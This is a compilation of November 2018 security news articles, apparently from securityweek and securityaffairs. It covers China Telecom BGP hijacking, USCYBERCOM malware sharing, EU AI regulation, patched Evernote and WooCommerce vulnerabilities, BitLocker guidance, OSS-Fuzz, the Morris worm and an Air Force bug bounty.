“Starting from February 2016 and for about 6 months, routes from Canada to Korean government sites were hijacked by China Telecom and routed through China. Figure 2a shows the shortest and normal route: Canada-US-Korea.” continues the report.
“As shown in figure 2b, however, the hijacked route started at the China Telecom PoP in Toronto, the traffic was then forwarded inside the Chinese network to their PoP on the US West Coast, from there to China, and finally to delivery in Korea.”
A similar attack occurred on October 2016, when traffic from several locations in the USA to a large Anglo-American bank headquarters in Milan, Italy was hijacked by China Telecom to China.
Another incident has happened on December 9, 2015, when traffic to Verizon APAC was hijacked through China Telecom. In response to the incident two of the major carriers of the affected routes implemented filters to refuse Verizon routes from China Telecom.
The security experts described many other BGP hijacking attacks involving China Telecom, further info is reported in the research paper.
Security experts are pushing to adopt solutions to protect BGP, Cloudflare for example, sustains that Resource Public Key Infrastructure (RPKI) could secure BGP routing.
U.S. Cyber Command Shares Malware via VirusTotal
8.11.2018 securityweek Virus
The U.S. Cyber Command (USCYBERCOM) this week started sharing malware samples with the cybersecurity industry via Chronicle’s VirusTotal intelligence service.
The project is run by USCYBERCOM’s Cyber National Mission Force (CNMF), which will post unclassified malware samples on the CYBERCOM_Malware_Alert account on VirusTotal.
“Recognizing the value of collaboration with the public sector, the CNMF has initiated an effort to share unclassified malware samples it has discovered that it believes will have the greatest impact on improving global cybersecurity,” USCYBERCOM stated.
CNMF claims that its goal is to “to help prevent harm by malicious cyber actors by sharing with the global cybersecurity community.”
Members of the cybersecurity industry can keep track of each new malware sample shared by CNMF through a dedicated Twitter account named USCYBERCOM Malware Alert (@CNMF_VirusAlert). The Twitter account currently has over 3,000 followers and the VirusTotal account is already trusted by more than 50 users.
The first malware samples shared by CNMF on VirusTotal are part of the Lojack (LoJax) family, which researchers observed recently in attacks apparently carried out by the Russia-linked cyber espionage group tracked as Sofacy, APT28, Fancy Bear, Pawn Storm, Sednit and Strontium.
The samples, contained in files named rpcnetp.exe and rpcnetp.dll, seem to be new and related to the UEFI rootkit analyzed by ESET after being used by the Russian threat actor to target government organizations in Central and Eastern Europe.
The Starter Pistol Has Been Fired for Artificial Intelligence Regulation in Europe
8.11.2018 securityweek IT
Artificial Intelligence Regulation - It is needed?
Regulation of Artificial Intelligence Could Potentially be More Complex and Far Reaching Than GDPR
Paul Nemitz is principal advisor in the Directorate-General Justice and Consumers of the European Commission. It was Nemitz who transposed the underlying principles of data privacy into the legal text that ultimately became the European Union's General Data Protection Regulation (GDPR).
Now Nemitz has fired the starting gun for what may eventually become a European Regulation providing consumer safeguards against abuse from artificial intelligence (AI). In a new paper published in the Philosophical Transactions of the Royal Society, he warns that democracy itself is threatened by unbridled use of AI.
In the paper titled, 'Constitutional democracy and technology in the age of artificial intelligence', he warns that too much power, including AI research, is concentrated in the hands of what he calls the 'frightful five' (a term used by the New York Times in May 2017): Google, Apple, Facebook, Amazon and Microsoft, also known as GAFAM. His concern is that these and other tech companies have always argued that tech should be above the law because the law does not understand tech and cannot keep up with it.
Their argument, he suggests, is epitomized in Google's argument in the Court of Justice of the European Union (CJEU) disputing the applicability of EU law on data protection to its search engine, "basically claiming that the selection process of its search engine is beyond its control due to automation in the form of an algorithm."
The implication of this argument is that the working of AI should not be subject to national laws simply because the purveyors of AI don't understand how its decisions are reached. Nemitz believes this attitude undermines the very principles of democracy itself. While democracy and laws are concerned with the good of the people, big business is concerned almost exclusively with profit.
He gets some support from the UK's Information Commissioner Elizabeth Denham. In an unrelated blog published November 6, 2018 discussing the ICO's investigation into the Facebook/Cambridge Analytica issue, she writes, "We are at a crossroads. Trust and confidence in the integrity of our democratic processes risks being disrupted because the average person has little idea of what is going on behind the scenes."
"It is these powerful internet technology corporations which have already demonstrated that they cannot be trusted to pursue public interest on a grand scale without the hard hand of the law and its rigorous enforcement setting boundaries and even giving directions and orientation for innovation which are in the public interest," writes Nemitz. He continues, "In fact, some representatives of these corporations may have themselves recently come to this conclusion and called for legislation on AI."
Here he specifically refers to a Bloomberg article titled, 'Microsoft Says AI Advances Will Require New Laws, Regulations'. But what the article actually says is, "Over the next two years, Microsoft plans to codify the company's ethics and design rules to govern its AI work, using staff from [Brad] Smith's legal group and the AI group run by Executive Vice President Harry Shum. The development of laws will come a few years after that, Smith said."
In other words, Microsoft expects regulation to take account of what it decides to do in AI, not that AI needs regulation before Microsoft codifies what it wants to do. Again, this implies that big business believes -- and acts -- as if business is more important than government: that profit supersedes democracy.
Nemitz believes that this attitude towards early stage development of the internet has allowed the development of a lawless internet. "Avoiding the law or intentionally breaking it, telling half truth to legislators or trying to ridicule them, as we recently saw in the Cambridge Analytica hearings by Mark Zuckerberg of Facebook, became a sport on both sides of the Atlantic in which digital corporations, digital activists and digital engineers and programmers rubbed shoulders."
He does neither himself nor his argument any favors, however, in warning that the unregulated internet has evolved into a medium for populists to communicate their ideologies in a manner not suited to democratic discourse. "Trump ruling by Tweet is the best example for this." While he may be accurate in principle, this personalization opens his argument to the criticism of bias.
Nemitz believes that the long-standing attitude by big business towards privacy and the internet must not be allowed to embed itself into AI and the internet. The implication is that this can only be controlled by regulation, and that regulation must be imposed by law rather than reached by consensus among the tech companies.
Business is likely to disagree. The first argument will be that you simply cannot regulate something as nebulous as artificial intelligence, nor should you wish to.
"Is regulatory control necessary over the navigation algorithm in my Roomba vacuum cleaner?" asks Raj Minhas, VP and director of the PARC Interactions and Analytics Lab at PARC (a Xerox company). "Is regulatory control necessary over the algorithm in my camera that automatically determines the exposure settings? Market forces can easily take care of these and many other similar AI systems."
It should be noted, however, that Nemitz is not calling for the regulation of AI itself, but for regulation over the use of AI and its effect on consumers. Indeed, in this sense, the European Union already has some AI regulation within GDPR -- automatic data subject profiling is prohibited. So, if AI within a vacuum cleaner collects data on its user, or if AI in a camera collects information on user interests for either cleaning companies' or holiday companies' targeted advertising purposes, without consent, this is already illegal under GDPR.
So, it is the abuse of AI driven by big business' need for profit rather than AI itself that concerns him. GDPR does not attempt to regulate targeted advertising -- instead it seeks to regulate the abuse of personal privacy used in targeted advertising. Nemitz believes the same principle-based technology-neutral approach to regulating AI abuses, even though we do not yet know what these future abuses might be, should be the way forward.
His first principle is to remove the subjective elements of human illegality, such as 'intent' or 'negligence'. Then, "it will be important to codify in law the principle that an action carried out by AI is illegal if the same action carried out by a human, abstraction made of subjective elements, would be illegal."
But he believes the foundation for AI regulation could be required impact assessments. For government use of AI, theses assessments would need to be made public. They would underpin 'the public knowledge and understanding' of AI, which currently lacks 'transparency'. The standards for such assessments would need to be set in law. "And as in the GDPR, the compliance with the standards for the impact assessment would have to be controlled by public authorities and non compliance should be subject to sufficiently deterrent sanctions."
But perhaps the key requirement he proposes is that "the use of AI should have a right, to be introduced by law, to an explanation of how the AI functions, what logic it follows, and how its use affect the interests of the individual concerned, thus the individual impacts of the use of AI on a person, even if the AI does not process personal data."
In other words, the argument put forward by Google that it is not responsible for the automated decisions of its search algorithms should be rejected, and the same rejection applied to all algorithms within AI. This will force responsibility for the effect of AI onto the user of that AI, regardless of the outcome on the object.
Such ideas and proposals can be viewed as the starting gun for GDPR-style legislation for AI. Nemitz is not a European Commissioner, so this is not an official viewpoint. But he is senior adviser in the most relevant EC office. It would be unrealistic to think these views are unknown or contrary to current early thinking within the EC. The likelihood is that there will be some GDPR-like legislation in the future. It is many years off -- but the arguments start now.
One of the biggest problems is that it could be seen as a governing party issue. Whether Nemitz views it like this or not, it could be claimed that he is asserting the right of an unelected European Commission to rule over citizens who could directly impose their will against what they use by pure market forces without the interference of bureaucrats
It could also be claimed that it is more driven by politico-economic wishes than by altruism. The 'frightful five' are all non-EU companies (i.e. U.S. companies) dominating the market and suppressing EU companies by force of their success. In short, it could be claimed that AI regulation is driven by anti-American economic bias.
Such arguments are already being made. Raj Minhas, while accepting that some of the Nemitz arguments and conclusions are fair, thinks that overall Nemitz is being too simplistic. He points out that the paper makes no mention of the 'good' achieved by the internet. "Would even a small fraction of that have been realized if the development of the internet had been shackled?" he asked SecurityWeek.
"He portrays technology companies (e.g. Google, Apple, Facebook, Amazon, and Microsoft) as shady cabals that are working to undermine democracy. Of course, the reality is far more complex," he said. "The technologies produced by those companies has done more to spread democracy and individual agency than most governments. The fact that they make lots of money should not automatically be considered a nefarious activity."
These large corporations are described as monoliths that single-mindedly work to undermine democracy. "Again, the reality is far more complex. These companies face immense pressure from their own employees to act in transparent and ethical ways -- they push them to give up lucrative military/government contracts because they don't align with the values of those employees. The fact that all these companies have a code of ethics for AI research is an outcome of those values rather than a diabolical plot to usurp democracy (as alleged by the author)."
The implication is that regulation is best left to self-regulation by the companies and their employees. This is a view confirmed by Nathan Wenzler, senior director of cybersecurity at Moss Adams. He accepts that there will inevitably need to be some regulation to "at least define where liability will rest and allow businesses to make sound decisions around whether or not it's worth it to pursue the course." He cites the moral and ethical issues around driverless vehicles when AI might be forced to decide between who to injure most in an unavoidable collision situation.
But as to more general AI regulation, he suggests, "Government regulators aren't exactly known for responding quickly to changes in technology matters, and as rapidly as AI programs are moving into becoming integrated into nearly everything, we may quickly reach a point where it simply won't be possible to regulate it all effectively... In the meantime, the best course of action we have presently is for the businesses involved in developing AI-powered tools and services to make the ethical considerations an integral part of their business decisions. It may be the only way we see the advantages of this technology take flight, while avoiding the potentially devastating down sides."
Kenneth Sanford, analytics architect and U.S. lead at Dataiku takes a nuanced view. He separates the operation of AI from the environment in which it is made and deployed. AI itself cannot be regulated. "Algorithms such as deep neural networks and ensemble models create an infinite number of possible recommendations that can never be regulated.," he told SecurityWeek.
He doesn't think that AI-based decision-making is actually changing much. "We have had personalized suggestions and persuasive advertising for years derived from generalizations and business rules. The main difference today is that these rules are codified in more finely determined micro segments and are delivered in a more seamless fashion in a digital world. In short, the main difference between now and 20 years ago is that we are better at it."
Any scope for regulation, he suggests, lies in the environment of AI. "What data are collected and how these data are used are a more realistic target for guardrails on the industry," he suggests.
This, however, is already regulated by GDPR. The unsaid implication is that no further AI-specific regulation is necessary or possible. But if the EU politicians take up the call for AI regulation as put forward by Paul Nemitz -- and his influence should not be discounted -- then there will be AI regulation. That legislation will potentially be more complex and far reaching than GDPR. The bigger question is not whether it will happen, but to what extent will GAFAM be able to shape it to their own will.
China Telecom Constantly Misdirects Internet Traffic
8.11.2018 securityweek BigBrothers
Over the past years, China Telecom has been constantly misdirecting Internet traffic through China, researchers say.
The telecommunication company, one of the largest in China, has had a presence in North American networks for nearly two decades, and currently has 10 points-of-presence (PoPs) in the region (eight in the United States and two in Canada), spanning major exchange points.
Courtesy of this presence, the company was able to hijack traffic through China several times in the past, Chris C. Demchak and Yuval Shavitt revealed in a recent paper (PDF). China Telecom’s PoPs in North America made the rerouting not only possible, but also unnoticeable for a long time, the researchers say.
Back in 2010, China Telecom hijacked 15% of the world’s Internet prefixes, which resulted in popular websites being rerouted through China for around 18 minutes. The incident impacted US government (‘‘.gov’’) and military (‘‘.mil’’) sites as well, the commission assigned to investigate the incident revealed (PDF).
For the past several years, the Internet service provider (ISP) has been engaging in various forms of traffic hijacking, in some cases for days, weeks, and months, Demchak and Shavitt claim.
“The patterns of traffic revealed in traceroute research suggest repetitive IP hijack attacks committed by China Telecom. While one may argue such attacks can always be explained by ‘normal’ BGP behavior, these in particular suggest malicious intent, precisely because of their unusual transit characteristics –namely the lengthened routes and the abnormal durations,” the researchers note.
Doug Madory, Director of Internet Analysis at Oracle, confirms the paper’s findings that the ISP has been engaged in traffic hijacking for a long time, but says the purpose of the action remains unclear. Oracle has gained deep visibility into Web traffic after the acquisition of web traffic management firm Dyn in 2016.
“China Telecom (whether intentionally or not) has misdirected internet traffic (including out of the United States) in recent years. I know because I expended a great deal of effort to stop it in 2017,” Madory says.
One of the observed incidents happened on December 9, 2015, when networks around the world who accepted the misconfigured routes inadvertently sent traffic to Verizon APAC through China Telecom.
After being alerted on the issue “over the course of several months last year,” two of the largest carriers of the affected routes implemented filters to no longer accept Verizon routes from China Telecom, which “reduced the footprint of these routes by 90%,” Madory notes.
Last year, he says, traffic was sent via mainland China even if it was supposed to travel only between peers in the United States. The issue repeated several times and resulted in a major US Internet infrastructure company deploying “filters on their peering sessions with China Telecom to block Verizon routes from being accepted.”
Referred to as BGP hijacking attacks (and also known as prefix or route hijacking), such incidents have become increasingly frequent over the past years, with a recent attack targeting payment processing companies in the US. According to Cloudflare, Resource Public Key Infrastructure (RPKI) could be the answer to securing BGP (Border Gateway Protocol) routing.
A serious cross-site scripting (XSS) vulnerability discovered in the Evernote application for Windows can be exploited to steal files and execute arbitrary commands.
Evernote patched this security hole in September with the release of version 6.16. However,
TongQing Zhu of Knownsec 404 Team found that arbitrary code could still be injected into the name of an attached picture.
Unlike in the previous case, however, the code loads a Node.js file from a remote server. The script is executed via NodeWebKit, an application runtime that is used by Evernote in presentation mode.
For the attack to work, the attacker needs to convince the targeted user to open an Evernote note in presentation mode. If the exploit is successfully executed, the attacker can steal arbitrary files and execute commands.
TongQing Zhu showed how a hacker could exploit the vulnerability to read a Windows file and execute the Calculator application on the targeted system.
Evernote first patched the flaw, tracked as CVE-2018-18524, with the release of Evernote for Windows 6.16.1 beta in mid-October. The patch was rolled out to all users earlier this month with the release of Evernote 6.16.4.
TongQing Zhu has published a couple of videos showing how the vulnerability can be exploited:
BehavioSec Adds New Features to Behavioral Biometrics Platform
8.11.2018 securityweek Safety
The relationship between security and user friction remains problematic. Businesses can increase security by strengthening authentication procedures, for example, by requiring multi-factor authentication in the form of soft tokens or biometric proof of identity. But this invariably makes it more time-consuming and complex for the user. This complexity, usually known as user friction, deters online visitors and encourages in-house staff to seek ways to bypass it.
But there are two further problems with the traditional approach to user authentication. Firstly, it only confirms the user at log-in, and secondly, attackers are increasingly succeeding in their attempts to defeat traditional multi-factor authentication. If an attacker gets past the initial authentication, he is into the network as an authenticated user.
It is the circle of user friction and single point verification that the relatively new concept of continuous behavioral biometrics seeks to square. Behavioral biometrics differs from (but can include) traditional biometrics by defining 'how you behave' rather than 'who you are'. It doesn't do this just at the point of entry but continuously while the user is accessing the system. So, if attackers use stolen credentials and get through the log-in stage, they will still be detected by how they use the system.BehavioSec Adds New Features to Behavioral Biometrics Platform
Behavioral biometrics operates by building a user profile. It doesn't require any personal information from the user, nor does it require any additional process by the user. It measures aspects like keyboard, touch pad, touch screen habits: two-finger typing versus touch-typing; touch pad pressure; swipe directions; and so on. For in-house systems it includes geo-location of the user, normal access times, normal folder accesses etcetera.
The result is an accurate ongoing confirmation of the user. If the logged-in user doesn't conform to the behavioral habits of the user profile, he or she is flagged as a possible intruder. The result is that multi-factor initial authentication barriers can be lowered -- reducing user friction -- while overall security is raised.
San Francisco, Calif-based BehavioSec, founded in 2007 by Olov Renberg, pioneered this approach to authentication. It has now added new features to version 5.0 of its Behavioral Biometrics Platform announced Wednesday, November 7, 2018.
Some of the new features are new capabilities; others improve existing operation. New features include global profiling, detection of obfuscated origin, and Docker container support.
Global profiling now detects suspicious behavior by comparing the current user session to those in BehavioSec's entire protected population -- helping to detect new account fraud by users never previously seen by BehavioSec or the customer concerned.
This is strengthened by BehavioSec's new ability to detect obfuscated origins hidden by VPNs, Tor, and other proxy services. It flags bad actors on their first connection by matching suspect requests against a real-time feed of 1.5 billion compromised devices.
The new support for Docker containers makes it easier to deploy BehavioSec in many on-prem environments.
Enhanced features in version 5.0 include improved continuous touch support, new detection algorithms, and improved case management.
The improved continuous touch support makes mobile user authentication more efficient. By including gesture information, mobile fraud can be detected even where the traditional keyboard doesn't exist, and the on-screen keyboard has only limited use.
The new detection algorithms reduce the number of interactions required to profile and recognize users, and improve the recognition of remote access attempts by bots. Bots and remote access scripts typically operate against the system in a pattern completely different to a human user.
Improved case management automates the integration of fraud alerts with third-party case management systems. This helps the fraud analysts better manage the process of responding to the alerts generated by the BehavioSec rules engine.
"Our financial services, retail and other customers all have common digital transformation goals," commented BehavioSec VP of products, Jordan Blake; "they need to rapidly scale security in ways that drive customers' trust and improve the user experience across Web and mobile interfaces."
With the new Docker support, and enhanced detection and integration updates, he added, "we continue to turn the tables on fraud by making 'the human algorithm' the strongest link in security. By continuously authenticating users according to unique behavioral attributes -- instead of a password or text message someone can steal -- BehavioSec reinvents anti-fraud. Traditional password-driven security is increasingly known for performance limitations and needless friction."
BehavioSec has raised a total of $25.7 million dollars in venture funding. The most recent Series B funding announced in January 2018 raised $17.5 million. It was led by Trident Capital.
Microsoft Releases Guidance for Users Concerned About Flawed SSD Encryption
8.11.2018 securityweek Safety
After security researchers discovered vulnerabilities in the encryption mechanism of several types of solid-state drives (SSDs), Microsoft decided to explain how one can enforce software encryption instead.
In a paper published earlier this week, researchers from the Radboud University in the Netherlands revealed a series of bugs in self-encrypting SSDs from Samsung and Crucial that essentially nullify the full-disk encryption feature.
Furthermore, they also showed that the issues can even break software-based encryption. Specifically, they explained, Microsoft’s BitLocker would rely on hardware encryption when it detects the functionality, thus leaving data unprotected on Windows systems where the flawed SSDs are used.
On Tuesday, Microsoft published an advisory to provide information on how users can enforce software encryption on their Windows systems, given that, when a self-encrypting drive is present, BitLocker would use hardware encryption by default.
“Administrators who want to force software encryption on computers with self-encrypting drives can accomplish this by deploying a Group Policy to override the default behavior. Windows will consult Group Policy to enforce software encryption only at the time of enabling BitLocker,” Microsoft says.
Admins can check the type of drive encryption being used (hardware or software) by running ‘manage-bde.exe -status’ from an elevated command prompt. If there are drives encrypted using a vulnerable form of hardware encryption, they can be switched to software encryption via a Group Policy.
To make the switch from hardware encryption to software encryption, the drive would first need to be unencrypted and then re-encrypted using software encryption, the tech giant notes. The drive, however, does not require reformatting.
“If you are using BitLocker Drive Encryption, changing the Group Policy value to enforce software encryption alone is not sufficient to re-encrypt existing data,” Microsoft says.
After configuring and deploying a Group Policy to enable forced software encryption, admins should completely turn off BitLocker to decrypt the drive, and then simply re-enable it.
Google Wants More Projects Integrated With OSS-Fuzz
8.11.2018 securityweek IT
Google this week revealed plans to reach out to critical open source projects and invite them to integrate with OSS-Fuzz.
Launched in December 2016, OSS-Fuzz is a free and continuous fuzzing infrastructure hosted on the Google Cloud Platform and designed to serve the Open Source Software (OSS) community through finding security vulnerabilities and stability issues.
OSS-Fuzz has already helped find and report over 9,000 flaws since launch, including bugs in critical projects such as FreeType2, FFmpeg, LibreOffice, SQLite, OpenSSL, and Wireshark.
Recently, Google has managed to consolidate the bug hunting and reporting processes into a single workflow, by unifying and automating its fuzzing tools, and believes that the OSS community should take advantage of this.
Thus, the Internet search giant has decided to contact the developers of critical projects and invite them to integrate with the fuzzing service.
“Projects integrated with OSS-Fuzz will benefit from being reviewed by both our internal and external fuzzing tools, thereby increasing code coverage and discovering bugs faster,” Google says.
Previously, the reporting process was a bit complex, as multiple tools were being used to identify bugs, while submissions were manually made to various public bug trackers, and then monitored until resolved.
“We are committed to helping open source projects benefit from integrating with our OSS-Fuzz fuzzing infrastructure. In the coming weeks, we will reach out via email to critical projects that we believe would be a good fit and support the community at large,” Google now says.
Projects that integrate are also eligible for rewards that range from $1,000 for initial integration to $20,000 for ideal integration. The rewards, Google says, should “offset the cost and effort required to properly configure fuzzing for OSS projects.”
Developers who would like to integrate their projects with OSS-Fuzz can submit them for review. Google wants to “admit as many OSS projects as possible and ensure that they are continuously fuzzed.” Contacted developers might be provided with a sample fuzz target for easy integration, the search company says.
30 Years Ago, the World's First Cyberattack Set the Stage for Modern Cybersecurity Challenges
8.11.2018 securityweek Cyber
(THE CONVERSATION) - Back in November 1988, Robert Tappan Morris, son of the famous cryptographer Robert Morris Sr., was a 20-something graduate student at Cornell who wanted to know how big the internet was – that is, how many devices were connected to it. So he wrote a program that would travel from computer to computer and ask each machine to send a signal back to a control server, which would keep count.
The program worked well – too well, in fact. Morris had known that if it traveled too fast there might be problems, but the limits he built in weren’t enough to keep the program from clogging up large sections of the internet, both copying itself to new machines and sending those pings back. When he realized what was happening, even his messages warning system administrators about the problem couldn’t get through.
His program became the first of a particular type of cyber attack called “distributed denial of service,” in which large numbers of internet-connected devices, including computers, webcams and other smart gadgets, are told to send lots of traffic to one particular address, overloading it with so much activity that either the system shuts down or its network connections are completely blocked.
As the chair of the integrated Indiana University Cybersecurity Program, I can report that these kinds of attacks are increasingly frequent today. In many ways, Morris’s program, known to history as the “Morris worm,” set the stage for the crucial, and potentially devastating, vulnerabilities in what I and others have called the coming “Internet of Everything.”
Unpacking the Morris worm
Worms and viruses are similar, but different in one key way: A virus needs an external command, from a user or a hacker, to run its program. A worm, by contrast, hits the ground running all on its own. For example, even if you never open your email program, a worm that gets onto your computer might email a copy of itself to everyone in your address book.
In an era when few people were concerned about malicious software and nobody had protective software installed, the Morris worm spread quickly. It took 72 hours for researchers at Purdue and Berkeley to halt the worm. In that time, it infected tens of thousands of systems – about 10 percent of the computers then on the internet. Cleaning up the infection cost hundreds or thousands of dollars for each affected machine.
In the clamor of media attention about this first event of its kind, confusion was rampant. Some reporters even asked whether people could catch the computer infection. Sadly, many journalists as a whole haven’t gotten much more knowledgeable on the topic in the intervening decades.
Morris wasn’t trying to destroy the internet, but the worm’s widespread effects resulted in him being prosecuted under the then-new Computer Fraud and Abuse Act. He was sentenced to three years of probation and a roughly US$10,000 fine. In the late 1990s, though, he became a dot-com millionaire – and is now a professor at MIT.
The internet remains subject to much more frequent – and more crippling – DDoS attacks. With more than 20 billion devices of all types, from refrigerators and cars to fitness trackers, connected to the internet, and millions more being connected weekly, the number of security flaws and vulnerabilities is exploding.
In October 2016, a DDoS attack using thousands of hijacked webcams – often used for security or baby monitors – shut down access to a number of important internet services along the eastern U.S. seaboard. That event was the culmination of a series of increasingly damaging attacks using a botnet, or a network of compromised devices, which was controlled by software called Mirai. Today’s internet is much larger, but not much more secure, than the internet of 1988.
Some things have actually gotten worse. Figuring out who is behind particular attacks is not as easy as waiting for that person to get worried and send out apology notes and warnings, as Morris did in 1988. In some cases – the ones big enough to merit full investigations – it’s possible to identify the culprits. A trio of college students was ultimately found to have created Mirai to gain advantages when playing the “Minecraft” computer game.
Fighting DDoS attacks
But technological tools are not enough, and neither are laws and regulations about online activity – including the law under which Morris was charged. The dozens of state and federal cybercrime statutes on the books have not yet seemed to reduce the overall number or severity of attacks, in part because of the global nature of the problem.
There are some efforts underway in Congress to allow attack victims in some cases to engage in active defense measures – a notion that comes with a number of downsides, including the risk of escalation – and to require better security for internet-connected devices. But passage is far from assured.
There is cause for hope, though. In the wake of the Morris worm, Carnegie Mellon University established the world’s first Cyber Emergency Response Team, which has been replicated in the federal government and around the world. Some policymakers are talking about establishing a national cybersecurity safety board, to investigate digital weaknesses and issue recommendations, much as the National Transportation Safety Board does with airplane disasters.
More organizations are also taking preventative action, adopting best practices in cybersecurity as they build their systems, rather than waiting for a problem to happen and trying to clean up afterward. If more organizations considered cybersecurity as an important element of corporate social responsibility, they – and their staff, customers and business partners – would be safer.
In “3001: The Final Odyssey,” science fiction author Arthur C. Clarke envisioned a future where humanity sealed the worst of its weapons in a vault on the moon – which included room for the most malignant computer viruses ever created. Before the next iteration of the Morris worm or Mirai does untold damage to the modern information society, it is up to everyone – governments, companies and individuals alike – to set up rules and programs that support widespread cybersecurity, without waiting another 30 years.
U.S. Cyber Command CNMF Shares unclassified malware samples via VirusTotal
8.11.2018 securityaffairs BigBrothers
The U.S. Cyber Command (USCYBERCOM) CNMF is sharing malware samples with the cybersecurity industry via VirusTotal intelligence service.
The U.S. Cyber Command (USCYBERCOM) is providing unclassified malware samples to VirusTotal intelligence service with the intent of sharing them with cybersecurity industry.
The USCYBERCOM’s Cyber National Mission Force (CNMF) is going to share the unclassified malware samples on the CYBERCOM_Malware_Alert VirusTotal account.
Researchers interested in the sample can follow the USCYBERCOM malware reporting handle on Twitter.
“Today, the Cyber National Mission Force, a unit subordinate to U.S. Cyber Command, posted its first malware sample to the website VirusTotal. Recognizing the value of collaboration with the public sector, the CNMF has initiated an effort to share unclassified malware samples it has discovered that it believes will have the greatest impact on improving global cybersecurity.” USCYBERCOM stated.
“Recognizing the value of collaboration with the public sector, the CNMF has initiated an effort to share unclassified malware samples it has discovered that it believes will have the greatest impact on improving global cybersecurity.”
CNMF was launched to improve information sharing on the cyber threats and allow early detection of the activities of malicious cyber actors.
USCYBERCOM Malware Alert
This Twitter account was created solely to provide alerts to the cybersecurity community that #CNMF has posted new malware to @virustotal. A log of our uploads can be found here: https://www.virustotal.com/en/user/CYBERCOM_Malware_Alert/ …
7:32 PM - Nov 5, 2018
145 people are talking about this
Twitter Ads info and privacy
The first samples shared by CNMF on VirusTotal belong to the Lojack (LoJax) family, in May several LoJack agents were found to be connecting to servers that are believed to be controlled by the notorious Russia-linked Fancy Bear APT group.
The samples recently shared appears to be associated with the UEFI rootkit discovered in September by the malware researchers from ESET.
Personally, I believe that this initiative of really important to rapidly profile threat actors and mitigate the spreading of malicious codes.
A critical Remote Code Execution vulnerability affects eCommerce website running on WordPress and using the WooCommerce plugin.
A critical vulnerability affects eCommerce website running on WordPress and using the WooCommerce plugin. WooCommerce is one of the major eCommerce plugins for WordPress that allows operators to easily build e-stores based on the popular CMS, it accounts for more than 4 million installations with 35% market share.
The vulnerability is an arbitrary file deletion vulnerability that could be exploited by a malicious or compromised privileged user to take over the online store.
The flaw was discovered by Simon Scannell, a researcher at RIPS Technologies GmbH,
“A flaw in the way WordPress handles privileges can lead to a privilege escalation in WordPress plugins. This affects for example WooCommerce, the most popular e-commerce plugin with over 4 million installations.” reads the security advisory published by RIPSTECH.
“The vulnerability allows shop managers to delete certain files on the server and then to take over any administrator account.”
The vulnerability was already fixed with the release of the plugin version 3.4.6.
Scannell pointed out that arbitrary file deletion flaws aren’t usually considered critical issues because attackers use them to cause is a Denial of Service condition by deleting the index.php of the website. Anyway, the expert highlighted that deleting certain plugin files in WordPress an attacker could disable security checks and take over the e-commerce website.
The expert published a video PoC that shows how to exploit the flaw allowing an account with “Shop Manager” role to reset administrator accounts’ password and take over the store.
The installation process of the plugin creates “Shop Managers” accounts with “edit_users” permissions, this means that these accounts can edit store customer accounts to manage their orders, profiles, and products.
The expert pointed out that an account with “edit_users” in WordPress could also edit an administrator account, for this reason, the WooCommerce plugin implements some extra limitations to prevent abuses.
Scannell discovered that an administrator of a WordPress website disables the WooCommerce component, the limitations that the plugin implements are no more valid allowing Shop Manager accounts to edit and reset the password for administrator accounts.
The expert explained that an attacker that controls a Shop Manager account can disable the WooCommerce plugin by exploiting a file deletion vulnerability that resides in the logging feature of WooCommerce.
“By default, only administrators can disable plugins. However, RIPS detected an arbitrary file deletion vulnerability in WooCommerce. This vulnerability allows shop managers to delete any file on the server that is writable. By deleting the main file of WooCommerce, woocommerce.php, WordPress will be unable to load the plugin and then disables it.” continues the post.
“The file deletion vulnerability occurred in the logging feature of WooCommerce.”
Once the flaws are exploited the WooCommerce plugin gets disabled, the shop manager can take over any administrator account and then execute code on the server.
Below the timeline for the flaw:
2018/08/30 The Arbitrary File Deletion Vulnerabiliy was reported to the Automattic security team on Hackerone.
2018/09/11 The vulnerability was triaged and verified by the security team.
2018/10/11 A patch was released.
The Automattic security team addressed the flaws with the release of the plugin version 3.4.6.
U.S. Air Force announced Hack the Air Force 3.0, the third Bug Bounty Program
8.11.2018 securityaffairs BigBrothers
The United States Air Force announced earlier this week that it has launched the third bug bounty program called Hack the Air Force 3.0.
The United States Air Force launched earlier this week its third bug bounty program, called Hack the Air Force 3.0, in collaboration with HackerOne.
“Thank you for your interest in participating in HackerOne’s U.S. Department of Defense (DoD) “Hack the Air Force 3.0” Bug Bounty challenge.” reads the announcement published by the United States Air Force.
“This is an effort for the U.S. Department of the Air Force to explore new approaches to its security, and to adopt the best practices used by the most successful and secure software companies in the world. By doing so, the U.S. Air Force can ensure its systems and warfighters are as secure as possible.”
The program started on October 19 and will last more than for weeks, its finish is planned for November 22.
Hack the Air Force 3.0 is the largest bug bounty program run by the U.S. government to date, it involves up to 600 researchers.
“Hack the AF 3.0 demonstrates the Air Forces willingness to fix vulnerabilities that present critical risks to the network,” said Wanda Jones-Heath, Air Force chief information security officer.
Participants will have to find vulnerabilities in the Department of Defense applications, 70% of the participants will be selected by the HackerOne reputation system and the remaining will be selected randomly.
The bug bounty is open for U.S. persons as defined by the Internal Revenue Code Section 7701(a)(30), including U.S. Government contractor personnel. The challenge is also open to foreign nationals based on their Government passport, who are not on the U.S. Department of Treasury’s Specially Designated Nationals List, and who are not citizens of China, Russia, Iran, and the Democratic People’s Republic of Korea.
“If you submit a qualifying, validated vulnerability, you may be eligible to receive an award, pending a security and criminal background check. Specific information on payment eligibility will be provided upon acceptance into the challenge.” continues the announcement.
The minimum payout for this challenge is $5,000 for critical vulnerabilities.
The first Hack the Air Force bug bounty program was launched by the United States Air Force in April 2017 to test the security of its the networks and computer systems.
The program allowed to discover over 200 valid vulnerabilities, researchers received more than $130,000. On February 2018, HackerOne announced the results of the second round for U.S. Air Force bug bounty program, Hack the Air Force 2.0.. The US Government paid more than $100,000 for over 100 reported vulnerabilities.
XSS flaw in Evernote allows attackers to execute commands and steal files
8.11.2018 securityaffairs Vulnerebility
Security expert discovered a stored XSS flaw in the Evernote app for Windows that could be exploited to steal files and execute arbitrary commands.
A security expert that goes online with the moniker @sebao has discovered a stored cross-site scripting (XSS) vulnerability in the Evernote application for Windows that could be exploited by an attacker to steal files and execute arbitrary commands.
In September, Evernote addressed the stored XSS flaw with the release of the version 6.16., but the fix was incomplete.
The expert TongQing Zhu from Knownsec 404 Team discovered that it was still possible to execute arbitrary with a variant of the above trick.
TongQing Zhu discovered that the code used instead of the name could load a Node.js file from a remote server, the script is executed via NodeWebKit that is used by Evernote in presentation mode.
“I find Evernote has a NodeWebKit in C:\\Program Files(x86)\Evernote\Evernote\NodeWebKit and Present mode will use it. Another good news is we can execute Nodejs code by stored XSS under Present mode.” explained TongQing Zhu.
